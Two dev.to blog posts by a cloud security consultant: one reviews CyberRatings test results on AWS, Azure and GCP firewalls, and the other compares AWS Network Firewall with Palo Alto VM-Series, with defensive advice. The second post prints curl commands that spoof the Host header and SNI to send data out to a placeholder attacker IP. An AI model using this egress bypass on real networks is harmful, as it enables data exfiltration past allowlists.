&lt;p&gt;Nevertheless, CyberRatings &lt;a href="https://www.sdxcentral.com/analysis/is-the-aws-network-firewall-safe-cyberratings-tests-reveal-concerns/" rel="noopener noreferrer"&gt;documented&lt;/a&gt; that they followed AWS documentation. Furthermore, they hired a certified AWS consultant to configure the firewall and worked directly with AWS engineers. Despite this, they found erroneous switching between engines. &lt;a href="https://aws.github.io/aws-security-services-best-practices/guides/network-firewall/" rel="noopener noreferrer"&gt;AWS Best Practice&lt;/a&gt; currently recommends setting the default stateless action to "Forward to Stateful Rule Groups" and completely avoiding configuring stateless rules. Simply put, it's killing half the engine because it's not cooperating with the other half.&lt;/p&gt;

&lt;h3&gt;
  
  
  Evasion is the real killer
&lt;/h3&gt;

&lt;p&gt;The exploit's 0.59% score is bad. The 0% evasion score is even worse.&lt;/p&gt;

&lt;p&gt;CyberRatings tested 2,500 attacks using 27 bypass techniques at Layers 3, 4, and 7. When a firewall fails to handle evasion at lower layers, the score drops dramatically - even if it detects several exploits at first glance. AWS NFW failed bypass tests so badly that it nullified several detected exploits.&lt;/p&gt;

&lt;p&gt;AWS has not publicly commented on or disputed the CyberRatings test results.&lt;/p&gt;

&lt;p&gt;For context: bypass techniques include things like IP fragmentation, TCP segmentation, and protocol-level obfuscation. These are standard techniques used daily by penetration testers and real attackers. A production-grade firewall must be able to handle them.&lt;/p&gt;

&lt;h2&gt;
  
  
  It's not just AWS - all three hyperscalers failed
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Cloud Provider&lt;/th&gt;
&lt;th&gt;Exploit Block Rate&lt;/th&gt;
&lt;th&gt;Overall (after evasions)&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;AWS Network Firewall&lt;/td&gt;
&lt;td&gt;0.59%&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;0%&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Azure Firewall&lt;/td&gt;
&lt;td&gt;55.28%&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;0%&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;GCP Cloud Firewall&lt;/td&gt;
&lt;td&gt;96.60%&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;0%&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Third-party average (5 vendors)&lt;/td&gt;
&lt;td&gt;99.61-100%&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;99.61-100%&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;GCP detected most of the exploits. But what good is that if bypass tests also yielded 0%? Azure is even worse than GCP.&lt;/p&gt;

&lt;p&gt;So what's the conclusion? AWS isn't terrible. The problem is that cloud-native firewalls aren't designed as next-generation firewalls (NGFWs). As &lt;a href="https://www.sdxcentral.com/analysis/hyperscaler-cloud-firewalls-again-fail-to-meet-basic-security-standards/" rel="noopener noreferrer"&gt;SDxCentral put it&lt;/a&gt;, "first-class cybersecurity firewall services aren't the highest priority for hyperscale cloud providers, whose first orders of business are to store and distribute data and not lose it."&lt;/p&gt;

&lt;p&gt;Let's be honest about this. AWS provides the infrastructure, and they sell security features as a bonus. Companies like Palo Alto Networks, Fortinet, and Check Point are strictly security-focused. The priorities are different, and therefore, the results are different.&lt;/p&gt;

&lt;h2&gt;
  
  
  What are CyberRatings anyway? Is it worth paying attention to them?
&lt;/h2&gt;

&lt;p&gt;This is, contrary to appearances, a very crucial question. Or maybe they're deliberately trying to make AWS look bad? Let's examine their credibility.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://cyberratings.org/about-us/leadership/" rel="noopener noreferrer"&gt;CyberRatings.org&lt;/a&gt; is a non-profit organization founded in November 2020 by &lt;strong&gt;Vikram Phatak&lt;/strong&gt;. Phatak founded &lt;strong&gt;NSS Labs&lt;/strong&gt; in 2007 and managed it for over a decade - NSS Labs was the industry standard for independent firewall testing before its closure. CyberRatings is currently working with the revived NSS Labs as an &lt;a href="https://cyberratings.org/cyberratings-org-names-nss-labs-as-official-testing-partner/" rel="noopener noreferrer"&gt;official testing partner&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;A few controversies: NSS Labs was involved in a &lt;a href="https://www.darkreading.com/endpoint-security/nss-labs-admits-its-test-of-crowdstrike-falcon-was-inaccurate-" rel="noopener noreferrer"&gt;legal dispute with CrowdStrike from 2017 to 2018&lt;/a&gt;, in which it admitted to "inaccurate" testing of the CrowdStrike Falcon endpoint product and subsequently filed an antitrust lawsuit against CrowdStrike, AMTSO, and several other vendors. The CrowdStrike portion was settled confidentially in 2019; the broader antitrust claims were dismissed by the court. This is a significant story and worth covering.&lt;/p&gt;

&lt;p&gt;CyberRatings' AWS NFW testing was self-funded, with no vendor involvement. It used the industry-standard methodology (Keysight CyPerf), and the results were consistent across three separate rounds of testing over a 12-month period. The fact that the company hired a certified AWS consultant and worked directly with AWS engineers makes the "misconfiguration" argument difficult to sustain.&lt;/p&gt;

&lt;h2&gt;
  
  
  Getting back to AWS Firewall... So what is it really good at?
&lt;/h2&gt;

&lt;p&gt;Despite these test results, I still recommend AWS Network Firewall to clients. Here's why.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Domain-based outbound filtering.&lt;/strong&gt; If you want to control which domains your workloads can reach, NFW does it well - especially with &lt;a href="https://docs.aws.amazon.com/network-firewall/latest/developerguide/tls-inspection-configurations.html" rel="noopener noreferrer"&gt;TLS inspection enabled&lt;/a&gt; to prevent &lt;a href="https://haitmg.pl/blog/aws-network-firewall-vs-palo-alto-vm-series/#the-egress-filtering-bypass-that-changes-the-conversation" rel="noopener noreferrer"&gt;SNI spoofing&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Network segmentation.&lt;/strong&gt; VPC-to-VPC traffic control via Transit Gateway. IP and port-based rules. Basic allow/deny logic. This is exactly what most teams use it for.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Centralized logging.&lt;/strong&gt; Full visibility of network flows thanks to native CloudWatch and S3 integration.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Zero operational overhead.&lt;/strong&gt; No patching, no sizing, no HA configuration. It just works.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Compliance checkbox.&lt;/strong&gt; For many compliance frameworks, having a firewall with logging and rules is a requirement - not a 99% score in an independent IPS test.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Cost.&lt;/strong&gt; At &lt;a href="https://aws.amazon.com/network-firewall/pricing/" rel="noopener noreferrer"&gt;$0.395/hour per endpoint&lt;/a&gt; (or $0.489 with TLS inspection), it's four times cheaper than using Palo Alto VM-Series. And as of &lt;a href="https://aws.amazon.com/about-aws/whats-new/2026/02/aws-network-firewall-new-price-reduction/" rel="noopener noreferrer"&gt;February 2026&lt;/a&gt;, AWS has eliminated additional data processing fees for advanced inspection.&lt;/p&gt;

&lt;p&gt;These are real benefits. For a startup focused on basic outbound filtering or an internal application behind a transit gateway, NFW is the right tool. Just don't confuse it with an IPS system.&lt;/p&gt;

&lt;h2&gt;
  
  
  So what do third-party firewalls do differently?
&lt;/h2&gt;

&lt;p&gt;The difference between 0.59% and 99.61% isn't due to budget or effort. It's about the architectural approach.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;App-ID vs. signatures.&lt;/strong&gt; Palo Alto's &lt;a href="https://www.paloaltonetworks.com/technologies/app-id" rel="noopener noreferrer"&gt;App-ID&lt;/a&gt; classifies traffic based on application behavior - payload inspection, behavioral patterns, protocol decoding - regardless of port. The AWS firewall classifies traffic based on port, protocol, and Suricata signatures. These are fundamentally different approaches. App-ID can distinguish legitimate HTTPS from reverse-shell tunneled protocols on port 443. To Suricata, both appear as TLS on port 443.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Full bypass support.&lt;/strong&gt; Third-party firewalls reassemble fragmented packets, normalize protocols, and handle TCP segmentation before applying detection rules. This is why they withstand bypass tests. This is computationally expensive and causes delays, but that's why you pay $3,000 per month instead of $750.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Continuous signature updates.&lt;/strong&gt; Palo Alto's threat intelligence team updates signatures daily, addressing new CVEs. AWS managed rule groups update less frequently and include fewer signatures.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;One note:&lt;/strong&gt; third-party firewalls aren't perfect. For example, in &lt;a href="https://cyberratings.org/cyberratings-org-and-nss-labs-announce-follow-on-enterprise-firewall-results/" rel="noopener noreferrer"&gt;CyberRatings' Q4 2025 test&lt;/a&gt;, Palo Alto Networks' PA-1410 firewall initially scored &lt;strong&gt;0% in bypass resistance&lt;/strong&gt; and a mere 46.37% in overall score. However, (credit where credit is due) after updating the Palo Alto operating system to version 11.2.10, its resistance increased to 100% and its overall score to 96.07%. The conclusion is simple: even companies dedicated to security must update their operating systems, and no vendor is always immune to vulnerabilities.&lt;/p&gt;

&lt;h2&gt;
  
  
  You've confused me... So what should I do?
&lt;/h2&gt;

&lt;p&gt;If you're using AWS Network Firewall, here are my recommendations:&lt;/p&gt;

&lt;h3&gt;
  
  
  1. Understand what you're actually getting
&lt;/h3&gt;

&lt;p&gt;NFW is a managed traffic filtering service. It's great for domain allow/deny lists, IP rules, and network segmentation. It's not an IPS that will detect known exploits. Adjust your expectations and security architecture accordingly.&lt;/p&gt;

&lt;h3&gt;
  
  
  2. Enable TLS Inspection
&lt;/h3&gt;

&lt;p&gt;If you haven't already, &lt;a href="https://docs.aws.amazon.com/network-firewall/latest/developerguide/tls-inspection-configurations.html" rel="noopener noreferrer"&gt;enable TLS inspection&lt;/a&gt;. This costs an additional $0.094/hour per endpoint, but it minimizes the &lt;a href="https://haitmg.pl/blog/aws-network-firewall-vs-palo-alto-vm-series/#the-egress-filtering-bypass-that-changes-the-conversation" rel="noopener noreferrer"&gt;SNI bypass vulnerability&lt;/a&gt; and provides real visibility into encrypted traffic.&lt;/p&gt;

&lt;h3&gt;
  
  
  3. Block QUIC
&lt;/h3&gt;

&lt;p&gt;AWS NFW &lt;a href="https://docs.aws.amazon.com/network-firewall/latest/developerguide/tls-inspection-considerations.html" rel="noopener noreferrer"&gt;can't inspect QUIC traffic&lt;/a&gt;. HTTP/3 relies on QUIC. Add a stateful rule to block UDP/443 and force clients to fall back to TCP/TLS, where the firewall can actually monitor traffic.&lt;/p&gt;

&lt;h3&gt;
  
  
  4. Don't use stateless rules
&lt;/h3&gt;

&lt;p&gt;Follow &lt;a href="https://aws.github.io/aws-security-services-best-practices/guides/network-firewall/" rel="noopener noreferrer"&gt;AWS best practices&lt;/a&gt;: set the default stateless action to "Forward to stateful rule groups." Don't configure stateless rules - they can interfere with stateful inspection. This is what CyberRatings says breaks the engine.&lt;/p&gt;

&lt;h3&gt;
  
  
  5. Layered Security
&lt;/h3&gt;

&lt;p&gt;NFW shouldn't be the only layer of security. Combine this with:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;GuardDuty&lt;/strong&gt; for threat detection (behavioral analysis, not signatures)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Security Hub&lt;/strong&gt; for posture management&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;WAF&lt;/strong&gt; against public applications&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;VPC endpoint policies&lt;/strong&gt; to restrict access to services&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;SCPs&lt;/strong&gt; to prevent misconfigurations at the organizational level&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  6. If you need a true IPS system, deploy an external NGFW
&lt;/h3&gt;

&lt;p&gt;For regulated industries (PCI-DSS, HIPAA, SOX), environments processing sensitive data, or organizations with active threat models involving targeted attacks, consider deploying an external NGFW on AWS. Check Point, Fortinet, Juniper, Palo Alto, and Versa all achieved scores of 99.61-100% in the same test, running on the same AWS infrastructure.&lt;/p&gt;

&lt;p&gt;Interestingly, this doesn't mean you have to abandon NFW. I've actually seen many environments using both solutions. NFW for broad traffic filtering and an external NGFW provider in a centralized VPC for in-depth inspection.&lt;/p&gt;

&lt;h2&gt;
  
  
  The real question no one asks
&lt;/h2&gt;

&lt;p&gt;The CyberRatings test measures how well a firewall detects known exploits and resists bypassing them. That matters. But it's not the whole picture.&lt;/p&gt;

&lt;p&gt;Most AWS security incidents I've seen weren't caused by an attacker exploiting a CVE through the firewall. They were caused by:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Overly permissive IAM policies&lt;/li&gt;
&lt;li&gt;S3 buckets with public access&lt;/li&gt;
&lt;li&gt;Security groups open to everyone&lt;/li&gt;
&lt;li&gt;Access keys that haven't been rotated in 900 days&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The &lt;a href="https://haitmg.pl/blog/aws-security-audit-checklist/" rel="noopener noreferrer"&gt;17 checks I perform during every AWS audit&lt;/a&gt; reveal more real risk than any firewall result. A team that fixes these fundamental issues and runs AWS NFW with TLS inspection is more secure than a team that deploys Palo Alto VM-Series but leaves its root account without MFA.&lt;/p&gt;

&lt;p&gt;Security is a matter of layers. Firewalls are one layer. Don't let the test result make you forget about the others.&lt;/p&gt;




&lt;h3&gt;
  
  
  Sources
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;CyberRatings.org, &lt;a href="https://cyberratings.org/cyberratings-org-publishes-test-results-on-cloud-network-firewalls/" rel="noopener noreferrer"&gt;"Q1 2025 Cloud Network Firewall Test Results"&lt;/a&gt;, April 2025&lt;/li&gt;
&lt;li&gt;CyberRatings.org, &lt;a href="https://cyberratings.org/cyberratings-org-announces-test-results-for-cloud-network-firewall/" rel="noopener noreferrer"&gt;"Cloud Network Firewall Comparative Test"&lt;/a&gt;, April 2024&lt;/li&gt;
&lt;li&gt;CyberRatings.org, &lt;a href="https://cyberratings.org/cyberratings-org-announces-test-results-for-cloud-service-provider-native-firewalls/" rel="noopener noreferrer"&gt;"CSP Native Firewall Test Results"&lt;/a&gt;, November 2024&lt;/li&gt;
&lt;li&gt;CyberScoop, &lt;a href="https://cyberscoop.com/independent-tests-show-why-orgs-should-use-third-party-cloud-security-services/" rel="noopener noreferrer"&gt;"Independent tests show why orgs should use third-party cloud security services"&lt;/a&gt;, April 2025&lt;/li&gt;
&lt;li&gt;SDxCentral, &lt;a href="https://www.sdxcentral.com/analysis/hyperscaler-cloud-firewalls-again-fail-to-meet-basic-security-standards/" rel="noopener noreferrer"&gt;"Hyperscaler Cloud Firewalls Again Fail to Meet Basic Security Standards"&lt;/a&gt;, April 2025&lt;/li&gt;
&lt;li&gt;SDxCentral, &lt;a href="https://www.sdxcentral.com/analysis/is-the-aws-network-firewall-safe-cyberratings-tests-reveal-concerns/" rel="noopener noreferrer"&gt;"Is the AWS Network Firewall Safe?"&lt;/a&gt;, May 2024&lt;/li&gt;
&lt;li&gt;CyberRatings.org, &lt;a href="https://cyberratings.org/cyberratings-org-and-nss-labs-announce-follow-on-enterprise-firewall-results/" rel="noopener noreferrer"&gt;"Follow-On Enterprise Firewall Results"&lt;/a&gt;, 2025&lt;/li&gt;
&lt;li&gt;AWS Documentation, &lt;a href="https://docs.aws.amazon.com/network-firewall/latest/developerguide/suricata-limitations-caveats.html" rel="noopener noreferrer"&gt;"Suricata Limitations"&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;AWS Documentation, &lt;a href="https://docs.aws.amazon.com/network-firewall/latest/developerguide/firewall-rules-engines.html" rel="noopener noreferrer"&gt;"Firewall Rules Engines"&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;AWS Documentation, &lt;a href="https://docs.aws.amazon.com/network-firewall/latest/developerguide/tls-inspection-considerations.html" rel="noopener noreferrer"&gt;"TLS Inspection Considerations"&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;AWS, &lt;a href="https://aws.amazon.com/network-firewall/pricing/" rel="noopener noreferrer"&gt;"Network Firewall Pricing"&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;AWS, &lt;a href="https://aws.amazon.com/about-aws/whats-new/2026/02/aws-network-firewall-new-price-reduction/" rel="noopener noreferrer"&gt;"Network Firewall Price Reduction"&lt;/a&gt;, February 2026&lt;/li&gt;
&lt;li&gt;Palo Alto Networks, &lt;a href="https://www.paloaltonetworks.com/technologies/app-id" rel="noopener noreferrer"&gt;"App-ID Technology"&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;Dark Reading, &lt;a href="https://www.darkreading.com/endpoint-security/nss-labs-admits-its-test-of-crowdstrike-falcon-was-inaccurate-" rel="noopener noreferrer"&gt;"NSS Labs Admits Falcon Test Inaccurate"&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;




&lt;p&gt;&lt;em&gt;Originally published at &lt;a href="https://haitmg.pl/blog/aws-network-firewall-security-test-results/" rel="noopener noreferrer"&gt;haitmg.pl&lt;/a&gt;. Running AWS Network Firewall and want to understand your actual security posture? I audit cloud infrastructure for a living - from firewall rules to IAM policies to network architecture. &lt;a href="https://haitmg.pl/#contact" rel="noopener noreferrer"&gt;Let's talk&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>aws</category>
      <category>security</category>
      <category>cloud</category>
      <category>devops</category>
    </item>
    <item>
      <title>AWS Network Firewall vs Palo Alto VM-Series - what I learned after deploying both in production</title>
      <dc:creator>Mariusz Gębala</dc:creator>
      <pubDate>Fri, 06 Mar 2026 09:42:49 +0000</pubDate>
      <link>https://dev.to/haitmg/aws-network-firewall-vs-palo-alto-vm-series-what-i-learned-after-deploying-both-in-production-56c8</link>
      <guid>https://dev.to/haitmg/aws-network-firewall-vs-palo-alto-vm-series-what-i-learned-after-deploying-both-in-production-56c8</guid>
      <description>&lt;p&gt;I've deployed both AWS Network Firewall and Palo Alto VM-Series firewalls in production AWS environments. Security VPC architectures for enterprise clients across automotive, government, and cultural sectors - some with AWS Network Firewall, others with Palo Alto VM-Series behind a Gateway Load Balancer.&lt;/p&gt;

&lt;p&gt;This is not a feature matrix from a vendor website. This is what I found after running both, what surprised me, and what you should know before choosing.&lt;/p&gt;

&lt;h2&gt;
  
  
  The short version
&lt;/h2&gt;

&lt;p&gt;AWS Network Firewall is good enough for most workloads. It's native, managed, and cheap to start with. But it has a &lt;strong&gt;documented egress filtering bypass&lt;/strong&gt; that lets an attacker circumvent your domain allowlist with a single curl command. If you're in a regulated industry or handle sensitive data, you need to understand this before committing.&lt;/p&gt;

&lt;p&gt;Palo Alto VM-Series catches things AWS Network Firewall doesn't - but you pay for it in complexity, cost, and operational overhead. It's not a slam dunk either.&lt;/p&gt;

&lt;h2&gt;
  
  
  Where AWS Network Firewall works well
&lt;/h2&gt;

&lt;p&gt;Let's start with what AWS gets right, because it gets a lot right.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Zero infrastructure to manage.&lt;/strong&gt; No EC2 instances, no patching, no sizing. You create a firewall, attach it to a VPC, and it works. It scales automatically - there's no capacity planning conversation.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Native integration.&lt;/strong&gt; Route tables, VPC, Transit Gateway - everything is first-party. No Gateway Load Balancer gymnastics, no GENEVE tunnels to debug. AWS Firewall Manager lets you deploy policies across an entire AWS Organization from a single place.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Suricata under the hood.&lt;/strong&gt; The stateful engine runs Suricata rules, which means you can use any compatible threat intelligence feed. If your team already knows Suricata, the learning curve is minimal.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Cost for basic use cases.&lt;/strong&gt; At &lt;a href="https://aws.amazon.com/network-firewall/pricing/" rel="noopener noreferrer"&gt;$0.395/hour per endpoint plus $0.065/GB processed&lt;/a&gt;, it's cheaper than VM-Series for low-to-medium traffic volumes. No license fees, no subscriptions.&lt;/p&gt;

&lt;p&gt;For a startup running a few services in a single VPC, or an internal application with basic egress filtering, AWS Network Firewall is perfectly adequate.&lt;/p&gt;

&lt;h2&gt;
  
  
  The egress filtering bypass that changes the conversation
&lt;/h2&gt;

&lt;p&gt;Here's where things get interesting. In September 2023, security researcher Jianjun Huo &lt;a href="https://canglad.com/post/2023/aws-network-firewall-egress-filtering-can-be-easily-bypassed/" rel="noopener noreferrer"&gt;documented a bypass&lt;/a&gt; in AWS Network Firewall's domain-based egress filtering. The vulnerability was also cataloged on &lt;a href="https://hackingthe.cloud/aws/post_exploitation/network-firewall-egress-filtering-bypass/" rel="noopener noreferrer"&gt;Hacking the Cloud&lt;/a&gt;, a well-known AWS security research resource.&lt;/p&gt;

&lt;h3&gt;
  
  
  How it works
&lt;/h3&gt;

&lt;p&gt;AWS Network Firewall uses the Server Name Indication (SNI) extension in TLS handshakes to determine which domain a client is connecting to. When you create a domain allowlist - say, only permit traffic to &lt;code&gt;*.amazonaws.com&lt;/code&gt; and &lt;code&gt;updates.example.com&lt;/code&gt; - the firewall checks the SNI field against your list.&lt;/p&gt;

&lt;p&gt;The problem: &lt;strong&gt;the firewall does not verify that the destination IP address actually belongs to the domain declared in the SNI.&lt;/strong&gt; AWS documentation explicitly states this:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;em&gt;"Network Firewall doesn't pause connections to do out-of-band DNS lookups."&lt;/em&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://docs.aws.amazon.com/network-firewall/latest/developerguide/tls-inspection-considerations.html" rel="noopener noreferrer"&gt;AWS Network Firewall documentation&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/blockquote&gt;

&lt;p&gt;This means an attacker (or malware) inside your VPC can do this:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# HTTP bypass - spoof the Host header&lt;/span&gt;
curl &lt;span class="nt"&gt;-H&lt;/span&gt; &lt;span class="s2"&gt;"Host: updates.example.com"&lt;/span&gt; http://attacker-controlled-ip.com/exfiltrate

&lt;span class="c"&gt;# HTTPS bypass - spoof the SNI&lt;/span&gt;
curl &lt;span class="nt"&gt;--resolve&lt;/span&gt; &lt;span class="s2"&gt;"updates.example.com:443:attacker-ip"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
     https://updates.example.com/exfiltrate &lt;span class="nt"&gt;--insecure&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The firewall sees &lt;code&gt;updates.example.com&lt;/code&gt; in the SNI, checks it against the allowlist, and lets the traffic through. The actual TCP connection goes to the attacker's IP. Data exfiltrated. Allowlist bypassed.&lt;/p&gt;

&lt;p&gt;This is not a theoretical attack. It's a &lt;a href="https://hackingthe.cloud/aws/post_exploitation/network-firewall-egress-filtering-bypass/" rel="noopener noreferrer"&gt;documented technique used in post-exploitation scenarios&lt;/a&gt;, and it's closely related to &lt;a href="https://attack.mitre.org/techniques/T1090/004/" rel="noopener noreferrer"&gt;domain fronting&lt;/a&gt; - a technique cataloged in the MITRE ATT&amp;amp;CK framework under T1090.004.&lt;/p&gt;

&lt;h3&gt;
  
  
  The mitigation - and its gaps
&lt;/h3&gt;

&lt;p&gt;AWS added TLS inspection to Network Firewall, and &lt;a href="https://repost.aws/questions/QUGi6L4x4nRsCYc_FJ9aQkiQ/prevent-aws-network-firewall-host-header-spoofing" rel="noopener noreferrer"&gt;as of early 2025, enabling TLS inspection blocks SNI spoofing by default&lt;/a&gt;. When TLS inspection is active, the firewall validates that the server certificate's domain matches the SNI in the client hello. If they don't match, the connection is dropped.&lt;/p&gt;

&lt;p&gt;This is good. But it comes with significant caveats:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;1. TLS 1.3 Encrypted Client Hello (ECH) and Encrypted SNI (ESNI) are not supported.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;From the &lt;a href="https://docs.aws.amazon.com/network-firewall/latest/developerguide/tls-inspection-considerations.html" rel="noopener noreferrer"&gt;official AWS documentation&lt;/a&gt;:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;em&gt;"Traffic encrypted using TLS v1.3 Encrypted SNI and Encrypted Client Hello extensions aren't supported."&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;When Network Firewall encounters a client hello without a visible SNI (because it's encrypted), it closes the connection with a RST packet. So you get security - but at the cost of breaking legitimate traffic that uses ECH. As ECH adoption grows (and it is growing - &lt;a href="https://www.enea.com/insights/tls-1-3-ech-how-to-preserve-critical-traffic-visibility-for-enterprise-and-network-security-while-safeguarding-privacy/" rel="noopener noreferrer"&gt;major browsers and CDN providers are rolling it out&lt;/a&gt;), this becomes a bigger compatibility problem.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;2. QUIC (UDP-based transport) is not inspectable.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;HTTP/3 runs over QUIC. AWS Network Firewall &lt;a href="https://docs.aws.amazon.com/network-firewall/latest/developerguide/tls-inspection-considerations.html" rel="noopener noreferrer"&gt;cannot inspect QUIC traffic&lt;/a&gt;. The recommended workaround? Block UDP/443 entirely and force applications back to TCP. That works, but it's a blunt instrument.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;3. TLS inspection adds cost and complexity.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Enabling TLS inspection bumps the endpoint cost from $0.395/hour to &lt;a href="https://aws.amazon.com/network-firewall/pricing/" rel="noopener noreferrer"&gt;$0.489/hour&lt;/a&gt;. You also need to deploy and manage CA certificates on every host that sends traffic through the firewall - or accept that you're only inspecting a subset of your traffic.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;4. Existing connections are dropped when you enable TLS inspection.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Adding TLS inspection to a running firewall &lt;a href="https://docs.aws.amazon.com/network-firewall/latest/developerguide/tls-inspection-considerations.html" rel="noopener noreferrer"&gt;interrupts existing traffic flows&lt;/a&gt;. This means you can't just flip it on during business hours.&lt;/p&gt;

&lt;h2&gt;
  
  
  How Palo Alto handles the same scenario
&lt;/h2&gt;

&lt;p&gt;Palo Alto VM-Series approaches this differently at a fundamental level.&lt;/p&gt;

&lt;h3&gt;
  
  
  App-ID vs port-based filtering
&lt;/h3&gt;

&lt;p&gt;AWS Network Firewall classifies traffic by port, protocol, and domain (via SNI/Host header). &lt;a href="https://www.paloguard.com/app-id.asp" rel="noopener noreferrer"&gt;Palo Alto's App-ID classifies traffic by application identity&lt;/a&gt;, regardless of port. It inspects packet payloads, analyzes behavioral patterns, and matches traffic against a library of thousands of application signatures.&lt;/p&gt;

&lt;p&gt;This means App-ID can tell the difference between "legitimate HTTPS to aws.amazon.com" and "reverse shell tunneled over port 443 pretending to be HTTPS to aws.amazon.com." Port 443 is port 443 to AWS Network Firewall. To Palo Alto, they're two completely different applications.&lt;/p&gt;

&lt;h3&gt;
  
  
  Built-in domain fronting detection
&lt;/h3&gt;

&lt;p&gt;Starting with &lt;a href="https://docs.paloaltonetworks.com/pan-os/10-2/pan-os-new-features/content-inspection-features/domain-fronting-detection" rel="noopener noreferrer"&gt;PAN-OS 10.2&lt;/a&gt;, Palo Alto firewalls with Threat Prevention or Advanced Threat Prevention can detect domain fronting attempts. When the domain in the SNI field differs from the HTTP Host header, the firewall generates a threat log entry with &lt;strong&gt;threat ID 86467&lt;/strong&gt; (classified as a Spyware signature).&lt;/p&gt;

&lt;p&gt;This is exactly the attack that bypasses AWS Network Firewall's domain filtering.&lt;/p&gt;

&lt;p&gt;The detection works because Palo Alto &lt;a href="https://knowledgebase.paloaltonetworks.com/KCSArticleDetail?id=kA10g000000ClVSCA0" rel="noopener noreferrer"&gt;inspects both the certificate's Common Name / Subject Alternative Name fields AND the SNI&lt;/a&gt;, and can automatically deny sessions where they don't match. AWS Network Firewall only gained similar capability through TLS inspection - and as noted above, with limitations.&lt;/p&gt;

&lt;h3&gt;
  
  
  What Palo Alto doesn't solve
&lt;/h3&gt;

&lt;p&gt;I'm not going to pretend VM-Series is perfect. Here's what you're signing up for:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;You manage EC2 instances.&lt;/strong&gt; VM-Series runs on EC2. You're responsible for instance sizing, patching PAN-OS, HA configuration, and monitoring. When Palo Alto releases a critical security update (and &lt;a href="https://security.paloaltonetworks.com/CVE-2024-9468" rel="noopener noreferrer"&gt;they do&lt;/a&gt; - CVE-2024-9468 was a DoS vulnerability in the threat prevention engine), you're the one applying it.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Gateway Load Balancer complexity.&lt;/strong&gt; The recommended production architecture uses a &lt;a href="https://docs.paloaltonetworks.com/vm-series/10-2/vm-series-deployment/set-up-the-vm-series-firewall-on-aws/vm-series-integration-with-gateway-load-balancer" rel="noopener noreferrer"&gt;centralized Security VPC with a Gateway Load Balancer&lt;/a&gt; distributing traffic across VM-Series instances. This means GENEVE encapsulation, appliance mode on Transit Gateway attachments, &lt;a href="https://www.paloaltonetworks.com/blog/network-security/vm-series-integration-with-aws-gateway-loadbalancer/" rel="noopener noreferrer"&gt;four separate subnets per AZ in the Security VPC&lt;/a&gt; (management, data, TGW, public), and careful route table configuration. It works beautifully when set up correctly. Getting there is not trivial.&lt;/p&gt;

